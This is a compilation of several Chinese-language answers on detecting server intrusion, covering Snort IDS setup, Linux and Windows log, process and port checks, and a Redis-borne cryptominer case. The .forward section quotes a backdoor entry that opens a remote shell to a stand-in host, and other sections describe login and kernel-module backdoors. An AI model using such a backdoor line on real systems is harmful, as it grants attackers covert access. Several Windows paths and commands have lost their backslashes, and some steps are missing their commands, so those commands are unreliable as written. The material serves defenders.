1.看程序，是否有CPU,記憶體使用異常的程序

2.檢視有沒有多餘系統使用者

3.檢視有沒有異常的開機啟動程式

4.檢視網絡卡流量有沒有異常增加

檢查伺服器是否被入侵，如果有資金投入，可以上專業的入侵檢測裝置IDS。但題主既然拿到這裡問，應該是不想投入資金來解決。事實上，不花錢也可以有兩種辦法來檢查。

1、用人工+純技術（不推薦）

這種方法說白了還是靠技術工程師。技術工程師對安全理解有多深就能檢查到多深。如果技術工程師，只是照搬照抄網路上幾個命令去檢查，基本沒有什麼用。因為現在的入侵已經不是10年前的入侵了。輕易留下痕跡的入侵是失敗的入侵。

大量的伺服器入侵都是隱藏在正常的訪問當中，或者病毒、木馬、甚至黑客攻擊當中。它們隱藏的更深，它們入侵的目的很多都不是為了破壞機器，而是為了獲取重要資料。所以，人工是很難發現它的。就算你是高手，等你發現時，入侵基本已經完成。資料已經被盜走。你說還有什麼意義嗎？所以，強烈不推薦這種方法。

如今的入侵行為要想被第一時間發現，必須在伺服器的入口，也就是網路上部署一套IDS自動化進行入侵檢測，它會自動分析所有通過網路的資料包，自動進行協議分析。一旦，發現可疑的資料行為。立即報警。哪些人工無法快速完成的繁雜的分析，對它來說瞬間即可完成。這才對現在有效入侵的檢測方式。

如今，不用花錢的開源IDS系統。網際網路上非常多。比如：Snort、Prelude IDS、Firestorm等等。這裡我就以“snort”來簡單介紹一下如何來部署一套開源IDS。

①、Snort入侵檢測原理

從技術上原理上講，Snort是一個基於特徵檢測的網路入侵檢測系統。檢測原理如下：

首先，要定義不符合安全策略的事件的特徵。這些定義特徵值的合集就成為一個安全特徵庫。sonrt自帶有廣大安全開發者定義的規則庫，專業人士，也可以自己定義規則庫。

其次，網路收集所有進入網路的資料包，然後對資料包進行分析，並和安全特徵庫進行比對。如果出現相應的特徵值，則該資料包被認為是可疑入侵。

隨後，然後對可疑入侵行為進行集中報警，同時記錄下日誌。我們就可以第一時間發現入侵行為。接下來，我們就可以去阻斷入侵。

Snort 入侵檢測的功能非常強大，而且是一個輕量級的檢測引擎。

②、Snort安裝步驟

第一步：環境準備（以windows為例）

我們得準備一臺伺服器。安裝上windows作業系統。

到網際網路下載Snort的最新windows 安裝包。

第二步：開始安裝程式

按照setup程式嚮導，一步一步往下安裝即可。安裝位置我們可以自由選擇，預設安裝在c:snort下。安裝到末尾，要求我們安裝抓包工具winpcap。這個必須安裝上去。

第三步：安裝規則庫

下載完成後，將下載的最新規則庫，進行解壓。並將解壓後都檔案替換掉安裝資料夾內的舊規則庫。這樣規則庫就安裝成功了

配置snort主要通過編輯配置檔案

snort.conf

。改檔案在安裝目錄下的etc

snort.conf

。編輯工具儘量用notepad++，比較方便。

在檔案中修改配置如下：var rule_path---c:snortulesvar so_rule_path---c:snortso_rulesvar preproc_rule_path---c:snortpreproc_rules。dynamicpreprocessor file c:snortlibsnort_dynamicpreprocessor

sf_dcerpc.dll

dynamicpreprocessor file c:snortlibsnort_dynamicpreprocessorsf_dns.dll dynamicpreprocessor file c:snortlibsnort_dynamicpreprocessor

sf_ftptelnet.dll

dynamicpreprocessor file c:snortlibsnort_dynamicpreprocessorsf_smtp.dll dynamicpreprocessor file c:snortlibsnort_dynamicpreprocessorsf_ssh.dlldynamicengine c:snortlibsnort_dynamicenginesf_engine.dlloutput alert_syslog: host=127.0.0.1:514, LOG_AUTH LOG_ALERT 

配置完這些，系統就可以運行了。

④、執行snort

系統執行需要在windows的命令列來啟動。我們通過cmd命令開啟cmd命令視窗。通過CD命令切換到c:snortin目錄下。在該目錄下執行

總結

在安全發展飛快的今天，我們需要通過自動化安全工具來幫助檢測伺服器是否被入侵。

如何判斷自己的伺服器是否被入侵了呢？

1、檢查系統密碼檔案

首先從明顯的入手，檢視一下passwd檔案，ls –l /etc/passwd檢視檔案修改的日期。

檢查一下passwd檔案中有哪些特權使用者，系統中uid為0的使用者都會被顯示出來。

　　

順便再檢查一下系統裡有沒有空口令帳戶：

　　

重點檢視程序：ps –aef | grep inetd

接下來根據找到入侵者在伺服器上的檔案目錄，一步一步進行追蹤。

檢查/etc/inetd.conf檔案，輸入：cat /etc/inetd.conf | grep –v “^#”，輸出的資訊就是你這臺機器所開啟的遠端服務。

4、檢查網路連線和監聽埠

輸入netstat -an，列出本機所有的連線和監聽的埠，檢視有沒有非法連線。

輸入netstat –rn，檢視本機的路由、閘道器設定是否正確。

輸入 ifconfig –a，檢視網絡卡設定。

5、檢查系統日誌

命令last | more檢視在正常情況下登入到本機的所有使用者的歷史記錄。但last命令依賴於syslog程序，這已經成為入侵者攻擊的重要目標。入侵者通常會停止系統的syslog，檢視系統syslog程序的情況，判斷syslog上次啟動的時間是否正常，因為syslog是以root身份執行的，如果發現syslog被非法動過，那說明有重大的入侵事件。

在linux下輸入ls –al /var/log

在solaris下輸入 ls –al /var/adm

檢查wtmp utmp，包括messgae等檔案的完整性和修改時間是否正常，這也是手工擦除入侵痕跡的一種方法。

通過傳送畸形請求來攻擊伺服器的某一服務來入侵系統是一種常規的入侵方法，典型的RPC攻擊就是通過這種方式。這種方式有一定的成功率，也就是說它並不能100%保證成功入侵系統，而且通常會在伺服器相應目錄下產生core檔案，全域性查詢系統中的core檔案，輸入find / -name core –exec ls –l {} ; 依據core所在的目錄、查詢core檔案來判斷是否有入侵行為。

7、.rhosts和.forward

這是兩種比較著名的後門檔案，如果想檢查你的系統是否被入侵者安裝了後門，不妨全域性查詢這兩個檔案：

find / -name “.rhosts” –print

find / -name “.forward” –print

在某使用者的$HOME下，.rhosts檔案中僅包含兩個+號是非常危險的，如果你的系統上開了513埠（rlogin埠，和telnet作用相同），那麼任意是誰都可以用這個使用者登入到你的系統上而不需要任何驗證。

Unix下在.forward檔案裡放入命令是重新獲得訪問的常用方法在某一 使用者$HOME下的.forward可能設定如下:

username|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 –e /bin/sh"

這種方法的變形包括改變系統的mail的別名檔案(通常位於/etc/aliases). 注意這只是一種簡單的變換. 更為高階的能夠從.forward中執行簡單指令碼實現在標準輸入執行任意命令(小部分預處理後).利用smrsh可以有效的制止這種後門(雖然如果允許可以自執行的elm"s filter或procmail類程式, 很有可能還有問題。在Solaris系統下，如果你執行如下命令：

ln -s /var/mail/luser ~/.forward

然後設定vacation有效，那麼/var/mail/luser就會被拷貝到~/.forward，同時會附加"|/usr/bin/vacation me"，舊的symlink被移到~/.forward..BACKUP中。

檢查檔案的完整性有多種方法，通常我們通過輸入ls –l 檔名來查詢和比較檔案，這種方法雖然簡單，但還是有一定的實用性。但是如果ls檔案都已經被替換了就比較麻煩。在LINUX下可以用rpm –V `rpm –qf 檔名` 來查詢，國家查詢的結果是否正常來判斷檔案是否完整。在LINUX下使用rpm來檢查檔案的完整性的方法也很多，這裡不一一贅述，可以man rpm來獲得更多的格式。

UNIX系統中，/bin/login是被入侵者經常替換作為後門的檔案，接下來談一下login後門 ：

UNIX裡，Login程式通常用來對telnet來的使用者進行口令驗證。入侵者獲取login的原始碼並修改，使它在比較輸入口令與儲存口令時先檢查後門口令。如果使用者敲入後門口令，它將忽視管理員設定的口令讓你長驅直入：這將允許入侵者進入任何賬號，甚至是root目錄。由於後門口令是在使用者真實登入並被日誌記錄到utmp和wtmP前產生的一個訪問，所以入侵者可以登入獲取shell卻不會暴露該賬號。管理員注意到這種後門後，使用”strings”命令搜尋login程式以尋找文字資訊。許多情況下後門口令會原形畢露。入侵者又會開始加密或者更改隱藏口令，使strings命令失效。所以許多管理員利用MD5校驗和檢測這種後門。UNIX系統中有md5sum命令，輸入md5sum 檔名檢查該檔案的md5簽名。它的使用格式如下：md5sum –b 使用二進位制方式閱讀檔案；md5sum –c 逆向檢查MD5簽名；md5sum –t 使用文字方式閱讀檔案。

在前面提到過守護程序，對於守護程序配置檔案inetd.conf中沒有被註釋掉的行要進行仔細比較，舉個簡單的例子，如果你開放了telnet服務，守護程序配置檔案中就會有一句：telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd

可以看到它所使用的檔案是 /usr/sbin/in.telnetd，檢查該檔案的完整性，入侵者往往通過替換守護程序中允許的服務檔案來為自己建立一個後門。

LINUX系統中的/etc/crontab也是經常被入侵者利用的一個檔案，檢查該檔案的完整性，可以直接cat /etc/crontab，仔細閱讀該檔案有沒有被入侵者利用來做其他的事情。

不替換login等檔案而直接使用程序來啟動後門的方法有一個缺陷，即系統一旦重新啟動，這個程序就被殺死了，所以得讓這個後門在系統啟動的時候也啟動起來。通常通過檢查/etc/rc.d下的檔案來檢視系統啟動的時候是不是帶有後門程式；這個方法怎麼有點象查windows下的trojan？

如果你的系統被人安裝了這種後門，通常都是比較討厭的，我常常就在想，遇到這種情況還是重新安裝系統算了J，言歸正傳，首先，檢查系統載入的模組，在LINUX系統下使用lsmod命令，在solaris系統下使用modinfo命令來檢視。這裡需要說明的是，一般預設安裝的LINUX載入的模組都比較少，通常就是網絡卡的驅動；而solaris下就很多，沒別的辦法，只有一條一條地去分析。對核心進行加固後，應禁止插入或刪除模組，從而保護系統的安全，否則入侵者將有可能再次對系統呼叫進行替換。我們可以通過替換create_module()和delete_module()來達到上述目的。另外，對這個核心進行加固模組時應儘早進行，以防系統呼叫已經被入侵者替換。如果系統被載入了後門模組，但是在模組列表/proc/module裡又看不到它們，有可能是使用了hack工具來移除載入的模組，大名鼎鼎的knark工具包就有移除載入模組的工具。出現這種情況，需要仔細查詢/proc目錄，根據查詢到的檔案和經驗來判斷被隱藏和偽裝的程序。Knark後門模組就在/proc/knark目錄，當然可能這個目錄是隱藏的。

10、手工入侵檢測的缺陷

上面談了一些手工入侵檢測的方法，但這些方式有一定的缺陷，有的甚至是不可避免的缺陷，這就是為什麼說手工檢測是“體力活”的原因。我們先來看看這些缺陷：

1）手工入侵檢測只能基於主機，也就是說所有的入侵檢測工作只能在作業系統下面完成，這是它固有的缺陷；基本上所有凌駕於作業系統之外的入侵行為統統無法探測得到。網路級的入侵，交換機、路由器上面的入侵和攻擊行為，作為伺服器的作業系統都無法得知；資訊已經從主機發送出去了，如果在傳送的介質當中被攔截，主機的作業系統是永遠無動於衷的。

2）手工的入侵檢測要求精通作業系統，並且漏洞庫資料的重新整理要快；在做一個網管的同時要做一個黑客。可以說經驗的積累永遠跟不上全世界漏洞資料的更新，難保系統不被新的漏洞所侵入。

3）手工入侵檢測只是“就事論事”，根據發生的某一情況判斷入侵事件，再作出相應的對應和防範措施，而無法預先根據入侵者的探測行為作出對攻擊事件的描述，定義事件級別，在不防礙系統正常工作的情況下阻止下一步對系統的入侵行為。

4）可以通過手工入侵檢測發現主機上的某些漏洞，進而作出相應的安全措施。但卻避免不了一種現象：無法避免兩個入侵者利用同一個漏洞攻擊主機，即無法判斷攻擊模式來切斷入侵行為。

5）綜上所述，手工的入侵檢測行為對於系統安全來說只是治標而不治本，多半還是依靠管理員的技巧和經驗來增強系統的安全性，沒有，也不可能形成真正的安全體系，雖然聊勝於無，可以檢測和追蹤到某些入侵行為，但如果碰上同樣精通系統的入侵者就很難抓住蹤跡了。

11、入侵檢測系統的比較

搭建真正的安全體系需要入侵檢測系統—IDS，一個優秀的入侵檢測系統輔以系統管理員的技巧和經驗可以形成真正的安全體系，有效判斷和切斷入侵行為，真正保護主機、資料。人們有時候會以為ISS的realsecure是優秀的入侵檢測系統，其實不然，realsecure帶有一定的缺陷，不談它對事件的誤報、漏報和錯報，首先它是一個英文的軟體，使用和熟悉起來有一定的難度。而且由於是外中國人的軟體，很多hack對realsecure有深入的研究，已經發掘出它的一些漏洞，甚至是固有漏洞，我就曾經測試出有的攻擊手段可以令realsecure癱瘓。再者，realsecure也是架設在伺服器作業系統之上的，作業系統停止工作，同樣令之停止工作，換句話說，很簡單，攻擊者攻擊的目標往往就是realsecure本身。設想，假設你的系統依賴於入侵檢測系統，而入侵檢測系統被攻擊者搞掉，那你的系統將大門敞開，任由出入，後果不堪設想。

全中文的入侵檢測系統當然是比較爽了，天闐探測引擎就是這當中比較典型的一種，它有自己的“黑匣子”，入侵者在攻擊一臺伺服器的時候，幾乎不可能找到該伺服器執行的天闐探測引擎，這樣就大大增加了攻擊的難度，提高了伺服器的安全性。

———————————————————————————————————

查殺後門

可以使用 D 盾查殺是否存在網站後門，如果存在 webshell，記錄下該 webshell 的資訊。

找到 webshell 後，就可以根據該檔案的路徑，在日誌裡查詢有關資訊，例如訪問該檔案的 IP、時間等。可以根據這些資訊確定網站別入侵的時間，從而縮小搜尋範圍，運氣好了可以直接根據 IP 找到黑客。

檢視指定目錄下檔案時間的排序

可以根據檔案的排序迅速找到被黑客修改的檔案，從而找到入侵時間。

該命令查詢 /var/log/wtmp 檔案並顯示 當前 系統中每個使用者和它所執行的程序資訊：

last

該命令往回搜尋 /var/log/wtmp 檔案來顯示自從該檔案第一次建立以來所有登入過的使用者

lastlog 命令

/var/log/lastlog 檔案在每次有使用者登入時被查詢。可以使用 lastlog 命令來檢查某特定使用者上次登入的時間，並格式化輸出上次登入日誌 /var/log/lastlog 的內容。它根據 UID 排序顯示登入名、埠號（tty）和上次登入時間。如果一個使用者從未登入過，lastlog 顯示 Never logged(從未登入過)。

分析伺服器的開機自啟程式，分析是否存在後門木馬程式。

引言

大多數受攻擊的伺服器是由程式執行的，這些攻擊者會濫用伺服器，只要能正常訪問，他們幾乎不採取任何預防措施隱藏他們正在做的事。

伺服器被攻破的跡象

當一個伺服器被一個缺乏經驗的，或者程式攻擊者破壞時，他們通常會做一些事情來消耗100%的資源。

這種資源通常是用於加密貨幣挖掘，或傳送垃圾郵件，或用於發起DDOS攻擊。

這意味著出現問題的第一個跡象是伺服器“執行緩慢”。這可能表現在網站服務頁面的速度比平時慢得多，或電子郵件需要花費很久才能傳送。

那麼應該怎麼排查呢?

檢查清單1 -誰正在登入?

首先要查詢的是當前登入到伺服器的使用者。

發現攻擊者實際登入到了伺服器，還堂而皇之在上面工作的，並不少見。

可以使用w指令檢查。

whois命令可以在IP地址上執行，它會告訴你有關該IP註冊到的所在地的所有資訊。

檢查清單2 -誰已經登入過?

Linux伺服器會記錄哪些使用者登入，從哪個IP登入，登入時間和登入時間。使用最last命令列印此資訊。

所以，如果你執行last指令，卻只看到你的當前登入，這就是一個不太妙了。

如果沒有登入歷史，就非常非常可疑了，需要繼續尋找攻擊的跡象。

檢查清單3 -命令歷史記錄

這種級別的攻擊者通常不採取任何預防措施，不留下任何命令歷史記錄，因此執行history命令將向你展示他們所做的一切。

特別留意wget或curl命令，可能會有系統庫以外的軟體被下載，如spam bots 或 crypto miners。

檢查清單4 -CPU

攻擊者通常很沒有截止，肆無忌憚地耗費著服務資源。這通常很容易發現，只需執行top檢視所有的程序。這會顯示在沒有登入的情況下使用你的伺服器。

如果有陌生的程序，可以在網上搜索一下，也可以使用 losf 或 strace 追蹤。確定可以PID後這樣做：

這會顯示程序正在進行的所有系統呼叫。有很多資訊，但是瀏覽這些資訊會讓你對正在發生的事情有一個很全面的瞭解。

lsof -p PID

這個程式將列出程序已開啟的檔案。

檢查清單5 - 系統程序

如果一個未經授權的程序消耗了CPU資源，仍然可以在 ps 所顯示的完整的程序列表中查詢到，使用 ps auxf，它可以列印最清晰的資訊。

尋找任何您不認識的程序。在伺服器上執行ps的次數越多，非法程序就越明顯。

檢查清單6 - 按程序檢視網路使用情況

命令iftop的功能與top類似，用於顯示正在傳送和接收網路資料，及其源和目標的程序的排序列表。

像DOS攻擊或垃圾郵件機器人這樣的程序，會立即出現在列表的頂部。

檢查清單7 - 哪些程序正在監聽網路連線?

通常，攻擊者會安裝一個除了監聽網路埠以獲取指令外，什麼也不做的程式。這並不消耗CPU或頻寬，因為它只是監聽狀態，所以top指令很難發現。

lsof 和 netstat 命令都將列出所有網路程序。我使用以下選項:

或者

你應該排查在 LISTEN 或 ESTABLISHED 中列出的任何程序，因為這些程序要麼正在等待連線(LISTEN)，要麼正在開啟連線(ESTABLISHED)。

如果你不認識這些程序，請使用 strace 或 lsof 檢視它們在做什麼。

挽回：發現被攻擊後，該怎麼辦？

首先要做的是不要驚慌，特別是在攻擊者當前登入的情況下。你需要能夠在攻擊者意識到你來了之前，收回對計算機的控制。

如果他們知道行蹤敗露，很可能會先把你踢出去，並開始惡意破壞任何資源。

如果你不是很專業，那麼只需關閉伺服器。

shutdown -h now

或者

systemctl poweroff

如果是雲伺服器，到控制面板關閉伺服器就行了。一旦它被關閉，你就可以根據需要設定的防火牆規則。

如果你覺得更有信心，主機提供商有一個上游防火牆，然後按這個順序建立和啟用以下兩個規則:

只允許你的IP地址可以通過SSH訪問；

關閉一切網路服務東西，不僅僅是SSH，而是每個埠上的每個協議。

這將立即終止攻擊者們的SSH會話，只允許你訪問伺服器。

如果你不能訪問上游防火牆，則必須在伺服器本身上建立並啟用這些防火牆規則，然後，當這些規則起作用時，使用 kill 命令殺掉攻擊者的ssh會話。

最後，如果有別的連線方式，可以登入到伺服器，就能用 systemctl stop network.service 停止連網。

這將完全停止任何網路訪問，你有大量的時間配置和啟用防火牆規則。

寫在最後

縱使重新控制了伺服器，還沒完呢。

不要試圖修復問題，繼續使用伺服器。你永遠無法確定攻擊者做了什麼，因此也無法保證伺服器是安全的。

唯一明智的做法是複製所有需要的資料，然後重新安裝。

Happy coding :)

使用客戶端/伺服器技術，DDOS攻擊多臺計算機，將它們組合為一個或多個目標上進行DDOS攻擊的平臺，從而增強了拒絕服務的能力。最基本的Dos攻擊是使用合理的服務請求，以便從服務中轉移過多的資源，從而阻止合法使用者響應請求。

如果DDoS受到攻擊，則通常有幾種跡象：

1、伺服器未連線，站點無法開啟

2、伺服器處理器忙

3、伺服器頻寬被大量佔用

4、ping域名不輸出IP

那怎樣預防伺服器被黑客攻擊呢？

管理伺服器密碼是伺服器安全性的重要組成部分。

密碼管理和替換應該建立一個長期機制。 我們要定期更改伺服器上的密碼，它必須是管理專家。 所選密碼應具有一定的專業水平，一定程度的複雜性，最好將數字和字母，大小和記錄的組合整合在一起。 在日常檢查中，我們必須準備統計資訊並關閉一些不常使用的埠。

大家說的方式都不錯，我也來分享一下我的伺服器被入侵的真實案例。

前言

前一陣子，阿里雲伺服器促銷，買了一臺2G的主機來做測試學習用，搭好環境後基本就沒怎麼管它，最近發現CPU總是跑滿，，於是按CPU消耗排序，排在第一的是一個名為“kdevtmpfsi”的程序，查了一下是一個挖礦木馬，於是趕緊採取辦法。

1檢視CPU佔用

Top 命令看了一下，有 1個 99% 的同名程序還在執行

看樣子像是伺服器被掛馬了，首先應該檢查伺服器是否有可疑的定時任務。使用crontab -l命令來檢視當前的伺服器的定時任務。經檢查後發現並無異常，只能看下這個程序的具體資訊了。

2不管你是什麼，統統Kill

廢話不多說，直接kill這個執行緒。

ps -ef |grep kdevtmpfsi

直接kill -9 (PID) 把這個執行緒幹掉了 過一陣子又回來了.....

甚至 find / -name kdevtmpfsi

發現再 /tmp/kdevtmpfsi 這個檔案

這麼一小段時間會沒有問題 可是過了一會兒這個執行緒就又啟動了繼續把cpu跑滿了。

配圖鬱悶

經過一番搜尋，確定是伺服器被當做“肉雞”，被挖礦了

3“肉雞”

此肉雞非彼肉雞。

電腦肉雞是一種病毒。感染此病毒的電腦會受別人控制。你的電腦就因此成為別人砧板上的肉，別人想怎麼吃就怎麼吃，肉雞（機）一名便由此而來。

肉雞一般被黑客以0.08、0.1元到30元不等價格出售。

要登陸肉雞，必須知道3個引數：遠端電腦的IP、使用者名稱、密碼。說到肉雞，就要講到遠端控制。遠端控制軟體例如灰鴿子、上興等。

肉雞不是吃的那種，是中了木馬，或者留了後門，可以被遠端操控的機器，許多人把有WEBSHELL許可權的機器也叫肉雞。誰都不希望自己的電腦被他人遠端控制，但是很多人的電腦是幾乎不設防的，很容易被遠端攻擊者完全控制。

4控制肉雞能什麼

看不慣哪個網站？操縱這些傀儡機器不停的請求該網站，讓別人沒法用，服務癱瘓，這就是傳說中的DDoS攻擊（分散式拒絕服務攻擊）。

想賺點小錢，偷偷挖礦是你不二的選擇，這麼多肉雞，雖然每一臺計算能力不怎麼樣，但是聯合起來也不容小。這種肉雞俗稱挖掘雞

肉雞做代理？這個話題我就不深說了，大陸敏感話題… …

窺探肉雞主人資料…

這麼多肉雞代表你有這麼多IP，有大量IP能幹什麼？這又是另外一個龐大的話題了

5如何防治

1、更改系統管理員賬戶的密碼，密碼長度不小於8位並且使用大寫字母/小寫字母/數字/特殊字元組合；

2、更改遠端登入埠並開啟防火牆限制允許登入的IP，防火牆配置只開放特定的服務埠並對FTP、資料庫等這些不需要對所有使用者開放的服務進行源IP訪問控制；

3、檢查是否開放了未授權的埠

輸入命令netstat–anp檢視

4、安裝專門的查殺病毒防木馬軟體，對伺服器進行全盤病毒掃描和查殺；

6、假如有WEB服務的，限制web執行賬戶對檔案系統的訪問許可權，只開放僅讀許可權。

6解決伺服器問題

找到程序後，我們追蹤溯源，找到的並kill執行緒和它的守護執行緒。

然後直接kill - 9（Pid） 殺死這倆個執行緒find / -name kdevtmpfsifind / -name kinsing

7後記

相信通過上圖的現實，你已經知道木馬是怎麼進來的呢，是利用Redis埠漏洞進來的，它可以對未授權訪問redis的伺服器登入，定時下載並執行指令碼，指令碼下載檔案並執行，進行系統監控、遠端呼叫、內網傳播等。所以除了執行上述操作，還要把未授權的redis服務設定密碼，修改埠號等，防止再次被入侵。做好安全防護，提高資訊保安意識。

首先判斷伺服器是什麼作業系統，不同作業系統檢查方法不一樣。

一、windows server 伺服器入侵檢查

1.檢測不正常賬號

查詢被新增的賬號，特別是管理員群組的（Administrators group）裡的新增賬戶：

C:lusrmgr.msc

C:>net localgroup administrators

C:>net localgroup administrateurs

2.檢查登錄檔啟動項

在Windoows 登錄檔裡檢視開機啟動項是否正常，特別一下注冊表項：

HKLMSoftwareMicrosoftWindowsCurrentVersionRun

HKLMSoftwareMicrosoftWindowsCurrentVersionRunonce

HKLMSoftwareMicrosoftWindowsCurrentVersionRunonceEx

3.檢查不正常的服務

檢查所有執行的服務，是否存在偽裝系統服務和未知服務，檢視可執行檔案的路徑。

4.檢查賬戶啟動資料夾

C:UsersAdministratorAppDataRoamingMicrosoftWindowsStartMenuProgramsStartup

5.檢視正在連線的會話

C:et use

6.檢查系統不正常網路連線

C:etstat –nao 5

7.檢查自動化任務

C:schtasks

8.檢查windows日誌中的異常

檢查防火牆、防毒軟體的事件，或任何可疑的記錄。檢查大量的登入嘗試錯誤或是被封鎖的賬戶。www伺服器匯入Web訪問日誌，並檢視分析Web訪問日誌是否完整有攻擊痕跡。檢查www目錄是否存在webshell網頁木馬，重點檢查類似upload目錄。

二、linux伺服器入侵檢查

1.檢查誰在登入

執行 w 會輸出如下結果：

12:32:00 up 12 days, 5:43, 2 users, load average: 0.05, 0.03, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root pts/0 110.174.161.11 12:26 0.00s 0.03s 0.02s ssh root@test root pts/1 178.31.109.12 12:26 0.00s 0.01s 0.00s w

2.檢查歷史登入使用者

使用 last 命令可以檢視這些資訊。

輸出類似這樣：

root pts/1 178.31.109.12 Thu Nov 30 12:26 still logged in root pts/0 110.174.161.11 Thu Nov 30 12:26 still logged in 檢查歷史執行命令

執行 history 命令會顯示他們曾經執行的命令。留意有沒有用 wget 或 curl 命令來下載類似垃圾郵件機器人或者挖礦程式之類的非常規軟體。

4.檢查哪些程序在消耗CPU

只需要執行 top ,系統會顯示最消耗cpu的前面幾個程序。

5.檢查哪些程序在監聽網路連線

執行 lsof -i 、netstat -plunt命令，需要留意那些處於 LISTEN 和 ESTABLISHED 狀態的程序，這些程序要麼正在等待連線（LISTEN），要麼已經連線（ESTABLISHED）。如果遇到不認識的程序，使用 strace 和 lsof 來看看它們在做什麼東西。

6.檢查系統登入日誌

Linux使用者登入資訊放在三個檔案中：

/var/run/utmp：記錄當前正在登入系統的使用者資訊，預設由who和w記錄當前登入使用者的資訊，uptime記錄系統啟動時間；

/var/log/wtmp：記錄當前正在登入和歷史登入系統的使用者資訊，預設由last命令檢視；

/var/log/btmp：記錄失敗的登入嘗試資訊，預設由lastb命令檢視。

#科技新星創作營#

如何檢查伺服器是否被入侵，這個不是一句兩句能夠說得清楚的，因為入侵包括的範圍是相當的大的。單靠自己對伺服器的一些手動上的基本分析是有一定難度的。基本上大的伺服器服務提供運營商一般都會有自己的防禦體系和完善的日誌，這些系統監控和安全日誌即使作為安全人員來說全部看懂，也是非常海量的，因此很多時候都是有著自己的防禦系統會進行定期分析，並且會有各種風險操作的評估和提示，但是作為網路運維人員和安全管理人員一般的檢查思維是通過如下步驟進行的。

一、檢查系統的密碼檔案

檢視一下passwd檔案，尤其是檢視passwd當中是否有一些特權使用者，一般系統中Uid為0的使用者特權許可權較高，可能會存在拿到控制權的可能性，但是能到這一步，我覺得這個入侵的黑客也太傻了，居然還給你留個你能看到的賬戶。另外還有檢視空口令賬號，一把這些賬號都是用來提升許可權用的。

二、就是檢視一下程序，看看有沒有特殊的程序，最好用程序分析工具來協助分析

一般網路運維人員不論是win系統還是linux運維，系統程序是必須要分析的，因為有些木馬工具和病毒都會有自己的程序，隱藏比較深的病毒和木馬會將自己的執行緒掛到正常的程序下面，因此要善於應用程序分析工具。比如inetd程序，需要重點檢視，看看是否有用這個程序去啟動一些奇怪的程式，一旦有基本上都是被入侵了。

三、檢查網路連線和監聽埠

檢查網路連線和對各個監聽埠的分析，也是必須要走的程式。比如：

輸入netstat -an，列出本機所有的連線和監聽的埠，檢視有沒有非法連線。

輸入netstat –rn，檢視本機的路由、閘道器設定是否正確。

輸入 ifconfig –a，檢視網絡卡設定。

通過查詢訪問的埠和異常IP地址進行異常分析也是常用的一種手段。四、檢查系統日誌

檢視在正常情況下登入到本機的所有使用者的歷史記錄，通過登入賬戶的時間和登入使用者名稱可以判斷是由於系統自身因鑑權或者其他操作登入，還是人為性質的登入，雖然登入日誌比較多，但是也會為入侵分析帶來一些輔助性的判斷依據。一般情況下linux系統下輸入在linux下輸入ls –al /var/log，既可以看到登入操作日誌，對了還要看下系統的syslog程序是否被停用了，因為如果但凡有點技術的黑客都會停止這個程序，來防止log記錄。

五、.rhosts和

.forward

這是兩種比較著名的後門檔案，如果想檢查你的系統是否被入侵者安裝了後門，不妨全域性查詢這兩個檔案，分別進行這兩個檔案和正常內容的對比。一般要是於異常，說明你的系統已經被攻破。

六、檢查系統檔案完整性

檢查檔案的完整性有多種方法，通常我們通過輸入ls –l 檔名來查詢和比較檔案。另外還有很多工具可以幫助你檢查系統檔案的完整性。另網路上也有很多運維網管寫的shell指令碼，直接執行指令碼就可以很方便的檢查系統檔案的完整性的，大家可以去找找進行嘗試。主要是通過檢查讀取每個檔案的checksum值來判定。

七、核心級後門的檢查

對於核心級後門的檢查，一般情況下是比較麻煩的，除非你有著很好的技術手段，否則還不如我重新把系統幹了重新安裝呢。因為需要模組一個個的分析，非常麻煩，而且其關鍵檔案隱藏的也比較深。

總之入侵分析是一個經驗工作，只有你不斷提升攻防技術和分析各種攻防實際案例，你才能更好的做好伺服器入侵檢測以及伺服器安全防禦，因此這既是一個枯燥的工作，還需要你長期不斷學習，很多時候技術經驗是非常有用的。

這裡簡單介紹一下吧，主要從5個方面來判斷伺服器是否被入侵，感興趣的朋友可以嘗試一下：

01檢視當前登入使用者

這種方式最簡單也最基本，檢視當前登入伺服器的使用者，如果有異常使用者或IP地址正在登入，則說明伺服器很可能被入侵，命令的話，使用w，who，users等都可以：

02檢視歷史登入記錄

伺服器會記錄曾經登入過的使用者和IP，以及登入時間和使用時長，如果有異常使用者或IP地址曾經登入過，就要注意了，伺服器很可能被入侵，當然，對方為了掩蓋登入，會清空/var/log/wtmp日誌檔案，要是你運行了last命令，只有你一個人登入，而你又從來沒清空過記錄，說明被入侵了：

03檢視特別消耗CPU程序

一般情況下，伺服器被入侵後，對方通常會執行一些非常消耗CPU任務或程式，這時你就可以執行top命令，檢視程序使用CPU的情況，如果有異常程序非常消耗CPU，而你又從來沒有執行過這個任務，說明伺服器很可能被入侵了：

04檢查所有系統程序

消耗CPU不嚴重或者未經授權的程序，一般不會在top命令中顯示出來，這時你就需要執行“ps auxf”命令檢查所有系統程序，如果有異常程序在後臺悄悄執行，而你又從來沒有執行過，這時就要注意了，伺服器很可能被入侵了：

05檢視埠程序網路連線

通常攻擊者會安裝一個後門程式（程序）專門用於監聽網路埠收取指令，該程序在等待期間不會消耗CPU和頻寬，top命令也難以發現，這時你就可以執行“netstat -plunt”命令，檢視當前系統埠、程序的網路連線情況，如果有異常埠開放，就需要注意了，伺服器很可能被入侵：

目前，就分享這5個方面來判斷伺服器是否被入侵，當然，伺服器如果已經被入侵，你就需要趕在對方發現你之前奪回伺服器的控制權，然後修改密碼、設定許可權、限定IP登入等，網上也有相關教程和資料，介紹的非常詳細，感興趣的話，可以搜一下，希望以上分享的內容能對你有所幫助吧，也歡迎大家評論、留言進行補充。

基本上很難，這需要你具備一定的網路安全知識。即便是一些大公司，也很難做到伺服器一被入侵就能夠立即發現，如果沒有專業的知識是不容易發現入侵痕跡的，這主要取決於黑客的水技術水平，技術高的黑客會把入侵痕跡清理得乾乾淨淨，運維人員水平再高也很難發現的。

一般來說判斷伺服器是否被入侵，需要檢查：

防毒軟體的記錄

如果防毒軟體有攔截木馬或惡意程式的記錄，那麼意味著你的伺服器有99%的可能已經淪陷。不過防毒軟體沒有記錄也並不意味著伺服器就沒被入侵過，一種可能是防毒軟體的記錄被黑客清除了，另一種可能是黑客使用的工具進行了免殺，殺軟無法識別，殺軟的工作機制決定了它後知後覺的基因，對黑客工具稍做修改就能繞過它。

作業系統的安全日誌

無論是Windows或Linux系統，任何敏感操作都會留下系統日誌，根據這些日誌查詢可疑的操作行為，以此判斷系統是否被入侵。

網站訪問日誌

